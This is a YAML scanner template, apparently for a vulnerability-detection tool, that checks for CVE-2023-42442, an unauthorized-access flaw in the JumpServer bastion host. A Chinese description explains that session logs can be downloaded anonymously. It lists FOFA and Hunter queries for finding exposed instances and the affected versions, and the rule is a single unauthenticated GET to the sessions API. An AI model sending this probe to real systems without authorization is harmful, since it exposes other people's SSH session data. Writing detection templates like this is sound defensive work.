id: CVE-2023-42442

info:
  name: JumpServer 未授权访问
  author: zan8in
  severity: high
  verified: true
  description: |-
    JumpServer开源堡垒机是一款运维安全审计系统产品，提供身份验证、授权控制、账号管理、安全审计等功能支持，帮助企业快速构建运维安全审计能力。JumpServer开源堡垒机通过企业版或者软硬件一体机的方式，向企业级用户交付开源增值的运维安全审计解决方案。
    该漏洞存在于JumpServer中，是一个未授权访问漏洞。api/api/v1/terminal/sessions/权限控制存在逻辑错误，可以被攻击者匿名访问。未经身份验证的远程攻击者可利用该漏洞下载ssh日志，并可借此远程窃取敏感信息。存储在 S3、OSS 或其他云存储中的ssh会话不受影响。
    FOFA: app="JumpServer-堡垒机"
    HUNTER: app.name="JumpServer"
    3.0.0 <= JumpServer <= 3.5.4
    3.6.0 <= JumpServer <= 3.6.3
  reference:
    - https://mp.weixin.qq.com/s/zg434WZcQ5gf5wV-KcCMUg
  tags: jumpserver,cve,cve2023
  created: 2023/09/20

rules:
  r0:
    request:
      method: GET
      path: /api/v1/terminal/sessions/
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"id":') &&
      response.body.bcontains(b'"user":') &&
      response.body.bcontains(b'"user_id":') &&
      response.body.bcontains(b'"asset_id":') &&
      response.body.bcontains(b'"protocol":')
expression: r0()
